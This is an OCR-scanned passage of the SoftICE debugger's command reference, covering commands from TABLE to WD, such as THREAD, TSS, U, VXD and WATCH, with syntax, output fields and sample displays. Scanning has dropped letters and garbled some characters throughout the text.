ATABLE Windows 3.1, Windows 95, Windows NT Symbol/Source 
AChange or display the current symbol table. 


%Syntax 
For Windows 3.1 
TABLE [[r] partial-table-name] | autoon | autooff | $ 


For Windows 95 and Windows NT 
TABLE [partial-table-name] | autoon | autooff | $ 


partial-table-name Symbol table name or enough of the first few characters to 
define a 

unique name. 

autoon Key word that turns auto table switching on. 

autooff Key word that turns auto table switching off. 

$ Specify $ to switch to the table where the current instruction pointer is 
located. 


%Use 

If you do not specify any parameters, all the currently loaded symbol tables 
are displayed with 

the current symbol table highlighted. If you specify a partial-table-name, that 
table becomes 

the current symbol table. 


Use the TABLE command when you have multiple symbol tables loaded. SoftICE 
supports 

symbol tables for 16- and 32-bit Windows applications and DLLs, 32-bit Windows 
VxDS, 

Windows NT device drivers, DOS programs, DOS loadable device drivers, and TSRs. 
Symbols are only accessible from one symbol table at time. You must use the 
TABLE 

command to switch to a symbol table before using symbols from that table. 

If you use the AUTOON keyword, SoftICE will switch to auto table switching 
mode. This 

will cause the current table to become whichever table the instruction pointer 
is in when 

SoftICE pops up. AUTOOFF turns off this mode. 


Tables are not automatically removed when your program exits. If you reload 
your program 

with the SoftICE Loader, the symbol table corresponding to the loaded program 
is replaced 

with the new one. 


For Windows 3.1 
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If the R parameter precedes partial-table-name, the specified table is removed. 
Specifying an 
°°*'' after the R parameter removes all symbol tables. 


For Windows 95 and Windows NT 

Symbol tables can be tied to an address context or multiple address contexts. 
If a table is tied 

to a context, switching to that table using the TABLE command switches to the 
appropriate 

address context. If you use any symbol from a context sensitive table, SoftICE 
switches to that 

context. Use View Symbol Tables in SoftICE Loader to remove tables from memory. 
The R 

parameter is not supported. 


%Example 

Since no parameters are specified in the following command, all loaded symbol 
tables are 

listed. GENERIC is highlighted, because it is the current table. The amount of 
available 

symbol table memory is displayed at the bottom. 

. : TABLE 

MYTSR. EXE 

MYAPP . EXE 

MYVXD 

GENERIC 

006412 bytes of symbol table memory available 


In the following example, the current table is changed to MYTSR.EXE. Notice 
that only 

enough characters to identify a unique table were entered. 

.:TABLE myt 


: TABS 
ATABS Windows 3.1, Windows 95, Windows NT Customization 
ADisplay or set the tab settings for source display. 


%Syntax 
TABS [tab-setting] 


tab-setting Number from 1 through 8 that specifies how many columns between 
tab stops. 


%Use 

Use the TABS command to display or set tab-settings for the display of source 
files. Tab stops 

can be anywhere from 1 to 8 columns. The default TABS setting is 8. TABS with 
no 

parameters display the current tab-setting. Specifying a tab-setting of 1 
allows the most source 

to be viewed since each tab will be replaced by a single space. 


%Example 

This example causes the tabs setting to change to every fourth column starting 
at the first 

display column. 

TABS 4 


: TASK 
ATASK Windows 3.1, Windows 95, Windows NT SystemInformation 
ADisplay the Windows task list. 
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%Syntax 
TASK 


%Use 

The TASK command displays information about all tasks that are currently 
running. The task 

that has focus is displayed with an asterisk after its name. This command is 
useful when a 

general protection fault occurs because it indicates which program caused the 
fault. 


For Windows NT 

The TASK command is process specific and only shows 16-bit tasks under Windows 
NT. In 

addition, it is only useful when the current context is that of an NTVDM 
process containing 

a WOW box. To view information or processes, refer to PROC on page 162. 


%Output 

For each running task, the following information displays: 

Task Name Name of the task. 

SS:SP Stack address of the task when it last relinquished control. 
StackTop Top of stack offset. 

StackBot Bottom of stack offset. 

StackLow Lowest value that SP has ever had when there was a context-switch 
away from the task. 

TaskDB Selector for the task data base segment. 

hQueue Queue handle for the task. This is just the selector for the queue. 
Events Number of outstanding events in the queue. 


For Windows 3.1 and Windows 95 

The TASK command works for 16- and 32-bit tasks, however, the following fields 
change for 

32-bit tasks: 

StackBot Highest legal address of the stack shown as a 32-bit flat offset. 
StackTop Lowest legal address of the stack shown as a 32-bit flat offset. 
StackLow Field is not used. 

SS:SP Contains the 16-bit selector offset address of the stack. If you examine 
the base address of the 16-bit selector, you see that this points at the 

same memory as does the flat 32-bit pointer used with the 32-bit data 
selector. 


%Example 

The following example shows the TASK command on Windows 3.1 running Win32s and 
its 

output. 

. TASK 

TaskNm SS:SP StackTop StackBot Low TaskDB hQueue Events 

FREECELL 21BF:7D96 86CE0000 86D00000 10FF 121F 0000 

PROGMAN 17A7:200A 0936 2070 14CE 064F 07D7 0000 

CLOCK 1427:1916 02E4 1A4E 143E 144F 1437 0000 

MSWORD * 29AF:913E 5956 93A4 7ADE 1F67 1F47 0000 


: THREAD 
ATHREAD Windows 95 SystemInformation 
ADisplay thread information. 


%Syntax 
THREAD [TCB | ID | task-name] 


TCB Thread Control Block. 
ID Thread ID number. 
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task-name Name of a currently running 32-bit process. 


%Use 
Use the THREAD command to obtain information about a thread. 
If you do not specify any options or parameters, the THREAD command displays 
information for every active thread in the system. 
If you specify a task-name as a parameter, all active threads for that 
process display. 
If you specify a TCB or ID, only information for that thread displays. 


%Output 

For each thread, the following information is shown: 

RingOTCB Address of the Ring-0 thread control block. This is the address that 
is 

passed to VxDs for thread creation and termination. 

ID VMM Thread ID. 

Context Context handle associated with the process of the thread. 

Ring3TCB Address of the KERNEL32 Ring-3 thread control block 

Thread ID Ring-3 thread ID 

Process Address of the KERNEL32 process database that owns the thread. 
TaskDB Selector of the task database that owns the thread. 

PDB Selector of the program database (protected-mode PSP). 

SZ Size of the thread which can be either 16 or 32 bit. 

Owner Process name of the owner. 


If you specify TCB or ID, this information displays for the thread with that 

TCB or ID: 
Current register contents for the thread. 

. Al thread local storage offsets within the thread. This shows the offset in 
the thread 

control block of the VMM TLS entry, the contents of the TLS entry, and the 
owner of 

the TLS entry. 


%Example 
This example displays the thread that belongs to the Winword process: 
. : THREAD 
The following%Example shows abbreviated information about the thread with ID 
8B. 
.:THREAD 8B 
RingOTCB ID Context Ring3TCB ThreadID Process TaskDB PDB SZ Owner 
C1051808 008B C104B990 815842CC FFF0671F 8158AAA8 274E 25B7 32 *Winword 
RingOTCB ID Context Ring3TCB ThreadID Process TaskDB PDB SZ Owner 
C1051808 008B C104B990 815842CC FFF0671F 8158AAA8 274E 25B7 32 *Winword 
CS:EIP=0137:BFF96868 SS:ESP=013F:0062FC3C DS=013F ES=013F FS=2EBF 6GS=0000 
EAX=002A002E EBX=815805B8 ECX=815842CC EDX=815805B8 I S P 
ESI=00000000 EDI=815805B8 EBP=0062FC80 ECODE=00000000 
TLS Offset 007C = 00000000 VPICD 
TLS Offset 0080 = 00000000 DOSMGR 
TLS Offset 0084 = 00000000 SHELL 
TLS Offset 0088 = C1053434 VMCPD 
TLS Offset 008C = C104EA74 VWIN32 
TLS Offset 0090 = 00000000 VFAT 
TLS Offset 0094 = 00000000 IFSMgr 


:THREAD (NT) 
ATHREAD Windows NT SystemInformation 
ADisplay information about a thread. 


%Syntax 
THREAD [-r | -x | -u] [thread-type | process-type] 


-r Display value of the thread's registers. 
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-X Display extended information for each thread. 

-u Display threads with user-level components. 
thread-type Thread handle or thread id. 

process-type Process-handle, process-id or process-name. 


%Use 
Use the THREAD command to obtain information about a thread. 
If you do not specify any options or parameters the THREAD command displays 
information for every active thread in the system. 
If you specify a process-type as a parameter, all the active threads for that 
process display. 
If you specify a thread-type, only information for that thread displays. 


For the -R and -X options, the registers shown are those that are saved on 
thread context 
switches: ESI, EDI, EBX and EBP. 


%Output 
For each thread, the following summary information is displayed: 
TID Thread ID. 


Krnl TEB Kernel Thread Environment Block. 

StackBtm Address of the bottom of the thread's stack. 
StackTop Address of the start of the thread's stack. 
StackPtr Threads current stack pointer value. 

User TEB User thread environment block. 

Process(Id) Owner process-name and process-id. 


Many fields of thread environment blocks are shown when extended output is 
specified, with 

most being self-explanatory. Some are particularly useful and deserve to be 
highlighted: 

TID Thread ID. 

KTEB Kernel Thread Environment Block. 

Base Pri, Dyn. Pri Threads base priority and current priority. 

Mode Indicates whether the thread is executing in user or kernel mode. 
Switches Number of context switches made by the thread. 

Affinity Processor affinity mask of the thread. Bit positions that are set 
represent processors on which the thread is allowed to execute. 

Restart Address at which the thread will start executing when it is resumed. 
The thread's stack trace is displayed last. 


%Example 

The following example uses the THREAD command to display the threads that 
belong to the 

Explorer process: 

. THREAD explorer 


This example displays extended information on the thread with ID 5Fh: 
THREAD -x 5f 

Extended Thread Info for thread 5F 

KTEB: FD850D80 TID: 05F Process: Explorer(60) 

Base Pri: D Dyn. Pri: E Quantum: 2 

Mode: User Suspended: 0 Switches: 00024B4F 

TickCount: 00EE8DA4 Wait Irql: 0 

Status: User Wait for WrEventPair 

Start EIP: KERNEL32!LeaveCriticalSection+0058 (6060744C) 

Affinity: 00000001 Context Flags: A 

KSS EBP: FB1C3F04 Callback ESP: 00000000 

Kernel Stack: FB1C2000 - FB1C4000 Stack Ptr: FB1C3ED8 

User Stack: 00030000 - 00130000 Stack Ptr: 0012FES3C 

Kernel Time: 0000014A User Time: 0000015F 
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Create Time: 01BB10646E2DBE90 

SpinLock: 00000000 Service Table: 80174A40 Queue: 00000000 

SE Token: 00000000 SE Acc. Flags: 001F03FF 

UTEB: 7FFDE000 Except Frame: 0012FEB4 Last Err: 00000006 

TID Krnl TEB StackBtm StkTop StackPtr User TEB Process(Id) 
006A FD857DA0 FB1CB000 FB1CD000 FB1CCED8 7FFDE000 Explorer(6B) 
006F FD854620 FB235000 FB237000 FB236B2C 7FFDD0O00 Explorer(6B) 
007C FD840020 FD72F000 FD731000 FD730E24 7FFDB000 Explorer(6B) 
Registers: ESI=FD850D80 EDI=0012FEC4 EBX=77F6BA0OC 
EBP=FB1C3F04 

Restart : EIP=80168757 a.k.a. _KiSetServerWaitClientEvent+01CF 
Explorer! .text+975D at 001B:0100A75D 

Explorer! .text+9945 at 001B:0100A945 

Explorer! .text+A3F8 at 001B:0100B3F8 

USER32!WaitMessage+004F at 001B:60A0CA4B 

user32!.text+070A at 001B:60A0170A 

=> ntdll!CsrClientSendMessage+0072 at 001B:77F6BA0C 


: TRACE 

ATRACE WINDOWS 3.1, WINDOWS 95 SYMBOL/SOURCE 
ACTRL-F9, TRACE B, CTRL-F12 

NAEnter or exit Trace simulation mode. 


%Syntax 
TRACE [b | off | start] 


start Hexadecimal number specifying the index within the back trace 
history buffer to start tracing from. An index of 1 corresponds to the 
newest instruction in the buffer. 


%Use 

Use the TRACE command to enter, exit, and display the current state of the 
trace simulation 

mode. TRACE with no parameters displays the current state of trace simulation 
mode. 

TRACE followed by off exits from trace simulation mode and returns to regular 
debugging 

mode. TRACE B enters trace simulation mode starting from the oldest instruction 
in the 

back trace history buffer. TRACE followed by a start number enters trace 
simulation mode at 

the specified index within the back trace history buffer. 


You can use the trace simulation mode only if the back trace history buffer 
contains 

instructions. To fill the back trace history buffer, use the BPR command with 
either the T or 

TW parameter to specifying a range breakpoint. 


When trace simulation mode is active, the help line on the bottom of the screen 
shows this, as 

well as the index of the current instruction within the back trace history 
buffer. 


Use the XT, XP, and XG commands to step through the instructions in the back 
race history 

buffer from within the trace simulation mode. When stepping through the back 
race history 

buffer, the only register that changes is the EIP register because back trace 
anges do NOT 

record the contents of all the registers. You can use all the SoftICE ommands 
within trace 
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simulation mode except for the following: X, T, G, P, HERE, and XRSET. 


%Example 

This example enters trace simulation mode starting at the eighth instruction n 
the back trace 

history buffer. 

TRACE 8 


:TSS 
ATSS Windows 3.1, Windows 95, Windows NT SystemInformation 
ADisplay task state segment and 1/0 port hooks. 


%Syntax 
For Windows 3.1 
TSS 


For Windows 95 and Windows NT 
TSS [TSS-selector] 


TSS-selector Any GDT selector that represents a TSS. 


%Use 

This command displays the contents of the task state segment after reading he 
task register 

(TR) to obtain its address. 


You can display any 32-bit TSS by supplying a valid 32-bit Task Gate selector s 
a parameter. 


Use the GDT command to find TSS selectors. If you do not specify a parameter, 
he current 
TSS is shown. 


%Output 
The following information is displayed: 
TSS selector value TSS selector number. 
selector base Linear address of the TSS. 
selector limit Size of the TSS. 


The next four lines of the display show the contents of the register fields n 
the TSS. The 

following registers are displayed: 

LDT, GS, FS, DS, SS, CS, ES, CR3 

EAX, EBX, ECX, EDX, EIP 

ESI, EDI, EBP, ESP, EFLAGS 

Level 0, 1 and 2 stack SS:ESP 


For Windows 3.1 and Windows 95 

Next, the TSS bit mask array is printed, which shows each I/0 port that has een 
hooked by a 

Windows virtual device driver (VxD). For each port, the following information s 
displayed: 

port number 16-bit port number. 

handler address 32-bit flat address of the port's 1/0 handler. All I/0 
nstructions on 

the port will be reflected to this handler. 

handler name Symbolic name of the 1/0 handler for the port. If symbols are 
available for the VxD, the nearest symbol will be displayed; otherwise 

the name of the VxD followed by the handler's offset within the VxD 

will be displayed. 


For Windows 95 and Windows NT 
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The 1/0 permission map base and size are also displayed. A size of zero 
ndicates that all I/0 is 

trapped. A non-zero size indicates that the I/0 permission map determines if n 
I/0 port is 

trapped. 


%Example 

The following example displays the task state segment in the Command window 
output of 

the bit mask array is abbreviated). 

.:TSS 

TR=0018 BASE=C000AEBC LIMIT=2069 

LDT=0000 GS=0000 FS=0000 DS=0000 SS=0000 CS=0000 ES=0000 
CR3=00000000 

EAX=00000000 EBX=00000000 ECX=00000000 EDX=00000000 EIP=00000000 

ESI=00000000 EDI=00000000 EBP=00000000 ESP=00000000 EFL=00000000 
SS0=0030:C33EEFA8 SS1=0000:00000000 SS2=0000:00000000 

I/0 Map Base=0068 I/0 Map Size=2000 

Port Handler Trapped Owner 

0000 C00C3E92 Yes VDMAD(01)+17BA 

0001 COOC3FOE Yes VDMAD(01)+1836 

0002 C00C3E92 Yes VDMAD(01)+17BA 

0003 COOC3FOE Yes VDMAD(01)+1836 

0004 C00C3E92 Yes VDMAD(01)+17BA 

0005 C00C3FOE Yes VDMAD(01)+1836 

0006 C00C3E92 Yes VDMAD(01)+17BA 

0007 C00C3FOE Yes VDMAD(01)+1836 

0008 C00C3C55 Yes VDMAD(01)+157D 

0009 C00C3D98 Yes VDMAD(01)+16C0 


If you are interested in which VxD has hooked port 21h (interrupt mask 
egister), you would 

look at the TSS bit mask output of the TSS display for the entry orresponding 
to the port. 

The following output, taken from the TSS command's output, indicates that the 
ort is 

hooked by the virtual PIC device and its handler is at offset 800792B4 in the 
lat code 

segment. This corresponds to an offset of 0AF8h bytes from the beginning of 
PICD'Ss code 

segment. 

0021 800792B4 VPICD+0AF8 


: TYPES. 

ATYPES Windows 95, Windows NT Symbol/SourceCommand 

AList all types in the current context or list all type information for the 
type-name specified. 


%Syntax 
TYPES [type-name] 


type-name List all type information for the type-name specified. 


%Use 

If you do not specify a type-name, TYPES lists all the types in the current 
ontext. If you do 

specify a type-name, TYPES lists all the type information for the type-name ou 
specified. If 

the type-name you specified is a structure, TYPES expands the structure and 
ists the typedefs 

for its members. 
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%Example 

The following example displays a partial listing of all the types in the urrent 
context: 

. : TYPES 

Size Type Name Typedef 

0x0004 ABORTPROC int stdcall (*proc) (void) 
0x0004 ACCESS_MASK unsigned long 

0x0004 ACL_INFORMATION_CLASS int 

0x0018 ARRAY_INFO struct ARRAY_INFO 

0x0002 ATOM unsigned short 

0x0048 BALLDATA struct _BALLDATA 

0x0048 _BALLDATA struct _BALLDATA 

0x0020 _BEZBUFFER struct _BEZBUFFER 

0x0004 BOOL int 

0x0001 BOOLEAN unsigned char 

0x0010 _BOUNCEDATA struct _BOUNCEDATA 

0x0004 BSTR unsigned short * 


The following example displays all the type information for the type-name 
bouncedata: 

.:TYPES _bouncedata 

typedef struct _BOUNCEDATA { 


public: 

void * hBall1 ; 
void * hBall2 ; 
void * hBall3 ; 
void * hBall4 ; 
}; 

:U 


AU Windows 3.1, Windows 95, Windows NT Display/ChangeMemory 
AUnassemble instructions. 


%Syntax 
For Windows 3.1 
U [address] | [Ssymbol-name] 


For Windows 95 and Windows NT 
U [address [1 length]] | [symbol-name] 


address Segment offset or selector offset. 
symbol-name Scrolls the Code window to the function you specify. 
length Number of instruction bytes. 


%Use 
The U command displays either source code or unassembled code at the pecified 
address. 


The code displays in the current mode (either code, mixed, or source) of the 
ode window, . 


Source displays only if it is available for the specified address. To change he 
mode of the Code 
window, use the SRC command (default key F3). 


If you do not specify the address, the command unassembles at the address here 
you left off. 


If the Code window is visible, the instructions display in the Code window, 
therwise they 

display in the Command window. In the Command window either eight lines isplay, 
or one 


Pagina 767 di 991 


less than the length of the Command window. 


To make the Code window visible, use the WC command (default key Alt-F3). To 
ove the 
cursor to the Code window, use the EC command (default key F6). 


If the instruction is at the current CS:EIP, it displays using the reverse ideo 
attribute. If the 

current CS:EIP instruction is a relative jump, it contains either the string 
UMP or NO 

JUMP, indicating whether or not the jump will be taken, and if so, an arrow 
ndicating if the 

jump will go up or down in the Code window. If the current CS:EIP instruction 
eferences a 

memory location, the contents of the memory location display in the Register 
indow 

beneath the flags field. If the Register window is not visible, this value 
isplays on the end of 

the code line. 


If a breakpoint is set on an instruction being displayed, the code line is 
isplayed using the 
bold attribute. 


If any of the memory addresses within an instruction have a corresponding 
ymbol, the 

symbol displays instead of the hexadecimal address. If an instruction is ocated 
at a code 

symbol, the symbol name displays on the line above the instruction. 


To view or suppress the actual hexadecimal bytes of the instruction, use the 
ODE 
command. 


For Windows 95 and Windows NT 

If you specify a length, SoftICE disassembles the instructions in the Command 
indow 

instead of the Code window. This is useful for reverse engineering, for xample, 
disassembling 

an entire routine and then using the SoftICE Loader Save SoftICE History 
unction to 

capture the output to a file. 


%Example 

To unassemble instructions beginning at 10 hexadecimal bytes before the urrent 
address, use 

the command: 

U eip - 10 

To display source in the Code window starting at line number 121, use the 
ommand: 

U .121 


For Windows 95 and Windows NT 

To disassemble 100 h bytes starting at MyProc to the Command window, use the 
ommand: 

U myproc L100 


: VCALL 
AVCALL Windows 3.1, Windows 95 System Information 
ADisplay the names and addresses of VxD callable routines. 


%Syntax 
VCALL [partial-name] 
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partial-name VxD callable routine name or the first few characters of the ame. 
If 

more than one routine's name matches the partial-name, all routines 

that start with the specified characters are listed. 


%Use 
The VCALL command displays the names and addresses of Windows VxD API outines. 


These are Windows services provided by VxDs for other VxDs. All the routines 
oftICE lists 

are located in Windows system VxDs that are included as part of the base-line 
indows 

kernel. 


The addresses displayed are not valid until the VMM VxD is initialized. If an 
is not present 

in the SoftICE initialization string, SoftICE pops up while Windows is ooting 
and VMM is 

not initialized. 


The names of all VxD APIs are static. Only the function names provided in the 
indows 

DDK Include Files are available. These API names are not built into the final 
xD executable 

file. SoftICE provides API names for the following VxDs: 

CONFIGMG IOS VCD VMCPD VSD 

DOSMGR NDIS VCOMM VMD VTD 

DOSNET PAGEFILE VCOND VMM VWIN32 

EBIOS PAGESWAP VDD VMPOLL VXDLDR 

ENABLE SHELL VDMAD VNETBIOS 

IFSMGR VB6MMGR VFBACKUP VPICD 

INT13 VCACHE VKD VREDIR 


%Example 
The following example lists all Windows system VxD calls that start with all. 
Sample output 
follows the command. 
VCALL call 
80006E04 Call _when_VM_Returns 
80009FD4 Call Global Event 
80009FF4 Call_VM_Event 
8000A018 Call Priority_VM_Event 
8000969C Call _when_VvM_Ints_Enabled 
800082C0 Call wWhen_Not_Critical 
8000889F Call when_Task_Switched 
8000898C Call _when_Idle 


: VER 
AVER Windows 3.1, Windows 95, Windows NT Miscellaneous 
ADisplay the SoftICE version number. 


%Syntax 
VER 


%Hint: To view your registration information and product serial number, start 
SoftIce Loader 
and choose About SoftICE Loader from the Help menu. 


%Example 

The following example displays the SoftICE version number and operating ystem 
version: 

VER 
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: VM 
%VM Windows 3.1, Windows 95 System Information 
%Display information on virtual machines. 


%Syntax 
VM [-S] [VM-ID] 


-S Switches to the VM identified by the VM-ID. 

VM-ID Index number of the virtual machine. Index numbers start at 1, where 
index number 1 is always assigned to the Windows System VM (the 

VM in which Windows applications run). 


%Use 

If no parameters are specified, the VM command displays information about all 
irtual 

machines (VM) in the system. If a VM-ID is specified, the register values of he 
VM are 

displayed. These registers are those found in the client register area of the 
irtual machine 

control block so they represent the values last saved into the control block 
hen there was a 

context switch away from the VM. If SoftICE is popped up while a VM is 
xecuting, the 

registers displayed in the SoftICE Register window, not the ones shown in the M 
command 

output, are the current registers for the VM. However, if you are in the irst 
few instructions 

of an interrupt routine where a virtual machine's registers are being saved o 
the control block, 

the CS:IP register may be the only valid register (the others have not been 
aved yet). 

The command displays two sets of segment registers plus the EIP and SP 
egisters. The 

segment registers are used for the protected mode and the real mode contexts f 
the VM. If a 

VM was executing in protected mode last, the protected mode registers are isted 
first. If V86 

mode was the last execution mode, the V86 segment registers are listed first. 
The general 

purpose registers (displayed below the segment registers) pertain to the egment 
registers listed 

first. 


A VM is a unit of scheduling for the Windows kernel. A VM can have one rotected 
mode 

thread under Windows 3.1, and multiple protected mode threads under Windows 5. 
In both 

cases the VM has one V86 mode thread of execution. Windows, Windows 
pplications, and 

DLLs all run in protected mode threads of VM 1 (the System VM). 


VMs other than the System VM normally have a V86 thread of execution only. 
owever, 

DPMI applications (also known as DOS extended applications) launched from hese 
VMS 

can also execute in a protected mode thread. 


The VM command is very useful for debugging VxDs, DPMI programs, and DOS 
rograms 

running under Windows. For example, if the system hangs while running a DOS 
rogram, 
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you can often find the address of the last instruction it executed with the M 
command (the 
CS:EIP shown for the VM's V86 thread). 


Another more esoteric, but highly valuable use for the VM command is found hen 
Windows faults all the way back to DOS. There are times when Windows cannot 
andle a 

fault and exits Windows and you end up back at the DOS prompt. 

If this happens, duplicate the problem with I1HERE ON in SoftICE (Windows 
xecutes an 

INT 1 prior to returning to DOS). When the fault happens, SoftICE pops up. se 
the VM 

command to find out the last address of execution and use the CR command to ind 
the fault 

address (CR2 contains the fault address). The ESI register usually points to an 
error message 

at this point. 


%Output 
For each virtual machine, the following information displays: 
VM Handle VM handle is actually a flat offset of the data structure that holds 
information about the VM. 
Status This is a bit mask that shows current state information for the VxD. 
The values are as follows: 
High Address Alternate address space for VM. This is where a VxD typically 
accesses 
VM memory (instead of 0). 


Note: It is likely for parts of the VM to be paged out at any one time 
0001H Exclusive mode 

0002H Runs in background 

0004H In process of creating 

0008H Suspended 

0010H Partially destroyed 

0020H Executing protected mode code 

0040H Executing protected mode app 

0080H Executing 32-bit protected app 

0100H Executing call from VxD 

0200H High priority background 

0400H Blocked on semaphore 

0800H woke up after blocked 

1000H Part of V86 App is pageable 

2000H Rest of V86 is locked 

4000H Scheduled by time-slices 

8000H Idle, has released time slice 

that you pop up SoftICcE. 

VM-ID Index number of this VxD, starting at 1. 
Client Registers Address of the saved registers of this VM. This address 
actually points 

into the level 0 stack for this VM. 


%Example 
VM 
Sample output follows: 
VM Handle Status High Addr VM-ID Client Regs 
806A1000 00004000 81800000 3 806A8F94 
8061A000 00000008 81400000 2 80515F94 
80461000 00007060 81000000 1 80013390 


:VXD 
AVXD Windows 3.1 SystemInformation 
ADisplay the Windows VxD map. 
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%Syntax 
VXD [VxD-name | partial-VxD-name] 


VxD-name Name of a virtual device driver. 
partial-VxD-name First few characters of the name. 


%Use 

This command displays a map of all Windows virtual device drivers in the 
command 

window. If no parameters are specified, all VxDs are displayed. If a VxD-name 
is specified, 

only information about the VxD with that name displays. 


Information that is shown about a VxD includes the VxD's control procedure 
address, its 

Protected Mode and V86 API addresses, and the addresses of all VxD services it 
implements. 

If the current CS:EIP belongs to one of the VvxD's in the map, the line with the 
address range 

that contains the CS:EIP will be highlighted. 

If a partial name is specified, SoftICE displays information on all VxDs whose 
name begins 

with the partial name. 


%Output 
If no parameters are specified, each entry in the VxD map contains the 
following information: 
VxD name Name specified in the .DEF file when the VxD was built. 
address Flat 32-bit address of one VxD section. VxDs are comprised of 
multiple sections where each section contains both code and data. (i.e. 
LockCode, LockData would be one section.) 
size Length of the VxD section. This includes both the code and the data 
of the VxD group. 
code selector Flat code selector. 
data selector Flat data selector. 
type Section number from the .386 file. 
id VxD ID number. The VxD ID numbers are used to obtain the 
Protected Mode and V86 API addresses that applications call. 
DDB Address of the VxDs Device Descriptor Block (DDB). This is a 
control block that contains information about the VxD such as the 
address of the Control Procedure and addresses of APIS. 


If a VxD name is specified, the following information is displayed in addition 
to the previous 

information: 

Control Procedure Routine to which all VxD messages are dispatched. 
Protected Mode API Address of the routine where all services called by 
protected mode 

applications are processed. 

V86 API Address Address of the routine where all services called by V86 
applications are 

processed. 

VxD Services List of all VxD services that are callable from other VxDs. For 
the 

Windows system VxDs, both the name and the address of the routines 

are displayed. 


%Example 


This example displays the VxD map in the Command window. The first few lines of 
the 
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display would look something like the following. The VxD names in the previous 
table can be 

used as symbol names. The address of seg 1 will be used when a VxD name is used 
in an 

expression. 

. :VXD 

VxDName Address Length Code Data Type ID DDB 

VMM 80001000 000193DO 0028 0030 LGRP 01 

VMM 80200000 00002F1C 0028 0030 IGRP 

LoadHi 8001A3d0 000007E8 0028 0030 LGRP 02 

LoadHi 80202F1C 00000788 0028 0030 IGRP 

WINICE 8001ABB8 00027875 0028 0030 LGRP 

CV1 80042430 0000036B 0028 0030 LGRP 

VDDVGA 8004279C 00007AD8 0028 0030 LGRP 

VDDVGA 80203648 000005EC 0028 0030 IGRP 


:VXD (95) 
AVXD Windows 95 SystemInformation 
ADisplay the Windows VxD map. 


%Syntax 
VXD [VxD-name] 


VxD-name Name or partial name of one or more virtual device drivers. 


%Use 

Use this command to obtain information about one or more VxDs. If you do not 
specify any 

parameters, it displays a map of all the Windows virtual device drivers that 
are currently 

loaded in the system. Dynamically loaded VxDs are listed after statically 
joaded VxDs. If a 

VxD-name is specified, only that VxD, or VxDs with the same string at the start 
of their 

name are displayed. For example, VM will match VMM and VMOUSE. If the current 
CS:EIP belongs to one of the VxDs in the map, the line with the address range 
that contains 

the CS:EIP is highlighted. 


If no parameters are specified, each entry in the VxD map contains this 
information: 

VxDName VxD Name. 

Address Base address of the segment. 

Length Length of the segment. 

Seg Section number from the executable. 

ID VxD ID. 

DDB Address of the VxD descriptor block. 

Control Address of the control dispatch handler. 

PM Y, if the VxD has a protected mode API. N otherwise. 

V86 Y, if the VxD has a V86 API. N otherwise. 

VXD Number of VxD services implemented. 

Win32 Number of Win32 services implemented. 

If a unique VxD name is specified, the following additional information 
appears: 

Init Order Order in which VxDs receive control messages. A zero value indicates 
highest priority. 

Reference Data The dword value that was passed from the real mode 
initialization 

procedure (if any) of the VxD. 

Version VxD version number. 

PM API PM API FLAT procedure address and PM API Ring-3 address used by 
applications. Refer to the following comments on PM and V86 APIs. 

V86 API V86 API FLAT procedure address and V86 API Ring-3 address used 
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by applications. Refer to the next comments on PM and V86 APIs. 


The PM API and V86 API parameters are register based and it is up to the 
individual VxD to 

define subfunctions and parameter passing (on entry EBX-VM Handle, EBP-client 
registers). 

If the Ring-3 address shown is 0:0, it means that no application code has yet 
requested the 

API address through INT 2F function 1684h. 


When the VxD being listed has a Win32 service table, the following information 
is presented 

for each service: 

Service Number Win32 Service Number. 

Service Address Address of the service API handler. 

Params Number of dword parameters the service requires. 

when the VxD being listed has a VxD service table, the following is shown for 
each service: 

Service Number VxD service number. 

Service Address Flat address of service. 

Service Name Symbol name if known (from VCALL list). 


%Example 

This example displays the VxD map in the Command window. The first few lines of 
the 

display look similar to the following. The VxD names in the previous table can 
be used as 

symbol names. The address of Seg 1 is used when a VxD name is used in an 
expression. 

. 1 VXD 

VxD 

Name 

Address Length Seg ID DDB Control PM V86 VxD Win32 

VMM C0001000 00FDCO 0001 0001 C000E990 C00024F8 Y Y 402 41 

VMM C0200000 000897 0002 

VMM C03E0000 000723 0003 

VMM C0320000 000095 0004 

VMM C0360000 00ED50 0005 

VMM C0260000 007938 0006 


: WATCH 
AWATCH Windows 3.1, Windows 95, Windows NT Watch 
AAdd a watch expression. 


%Syntax 
WATCH expression 


%Use 
Use the WATCH command to display the results of expressions. SoftICE determines 
the size 
of the result based on the expression's type information. If SoftICE cannot 
determine the size, 
dword is assumed. The expressions being watched are displayed in the Watch 
window. There 
can be up to eight watch expressions at a time. Every time the SoftICE screen 
is popped up, 
the Watch window displays the expression's current values. 
Each line in the Watch window contains the following information: 
Expression being evaluated. 
Expression type. 
Current value of the expression displayed in the appropriate format. 
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A plus sign (+) preceding the type indicates that you can expand it to view 
more information. 

To expand the type, either double-click the type or press Alt-W to enter the 
watch window, 

use the UpArrow and DownArrow keys to move the highlight bar to the type you 
ant to 

expand, and press Enter. 


If the expression being watched goes out of scope, SoftICE displays the 
following message: 
°°Error evaluating expression''. 


To delete a watch, use either the mouse or keyboard to select the watch and 
press Delete. 


%Example 
This example creates an entry in the Watch window for the variable hInstance. 
WATCH hInstance 


This example indicates that the type for hInstance is void pointer (void *) and 
its current 

value is 0x00400000. 

hPrevInstance void * = 0x00400000 

The following example displays the dword to which the DS:ESI registers point. 
WATCH ds:esi 

ds:esi void * =0x8158D72E 


To watch what ds:esi points to, use the pointer operator (*): 
WATCH * ds:esi 


The following example sets a watch on a pointer to a character string 
lpszCmdLine. The 
results show the value of the pointer (0x8158D72E) and the ASCII string 
(currently null). 
WATCH lpszCmdLine +char * =0x8158D72E <""> 
Double-clicking on this line expands it to show the actual string contents. 
lpszCmdLine -char * =0x8158D72E 
char = 0x0 


WC 
AWC WINDOWS 3.1, WINDOWS 95, WINDOWS NT WINDOWCONTROL 
NAlt-F3 


AToggles the Code window open or closed; and sets the size of the Code window. 


%Syntax 
WC [window-size] 


window-size Decimal number. 


%Use 

If you do not specify window-size, WC toggles the window open or closed. If the 
Code 

window is closed, WC opens it; and if it is open, WC closes it. 

If you specify the window-size, the Code window is resized. If it is closed, WC 
opens it to the 

specified size. 


when the Code window is closed, the extra screen lines are added to the Command 
window. 


When the Code window is opened, the lines are taken from the other windows in 
the 
following order: Command and Data. 
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If you wish to move the cursor to the Code window, use the EC command (default 
key F6). 


%Example 

If the Code window is closed, the following example displays the window and 
sets it to twelve 

lines. If the Code window is open, the example sets it to twelve lines. 

WC 12 


:WD 
AWD WINDOWS 3.1, WINDOWS 95, WINDOWS NT WINDOWCONTROL 
NALlt-F2 


AToggles the Data window open or closed; and sets the size of the Data window. 


